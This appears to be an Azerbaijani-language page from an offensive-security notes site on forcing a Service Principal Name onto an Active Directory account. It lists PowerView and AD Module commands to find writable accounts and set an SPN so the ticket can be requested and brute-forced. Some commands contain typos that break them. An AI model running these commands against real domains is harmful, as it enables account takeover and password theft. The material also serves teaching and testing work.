Force Set SPN

SPN nədir?

SPN Service Principal Name üçün qısaldılmışdır. O, Active Directory mühitində hesaba və ya xidmətə unikal şəxsiyyət vermək üçün istifadə edilən identifikatordur. SPN-lər çox vaxt Kerberos autentifikasiya protokolu ilə əlaqələndirilir.

SPN-dən necə istifadə edə bilərik?

Kifayət qədər icazələrimiz varsa (GenericAll/GenericWrite) biz hədəf hesaba SPN təyin edə, TGS tələb edə, sonra onun blobunu tutub bruteforce edə bilərik.

PowerView

#Hesablarda maraqlı icazələri yoxlayın:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentinyReferenceName -match "RDPUsers"}

#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayın
Get-DomainUser -Identity <UserName> | select serviceprincipalname

#Hesabda SPN təyin etməyə məcbur edin:
Set-DomainObject <UserName> -Set @{serviceprincipalname='ops/whatever1'}

AD Module:

#Cari istifadəçinin artıq bir SPN təyin edib-etmədiyini yoxlayın
Get-ADUser -Identity <UserName> -Properties ServicePrincipalName | select ServicePrincipalName

#Hesabda SPN təyin etməyə məcbur edin:
Set-ADUser -Identiny <UserName> -ServicePrincipalNames @{Add='ops/whatever1'}

PreviousPassword Spray Attack NextAbusing Shadow Copies

Last updated 1 year ago

Was this helpful?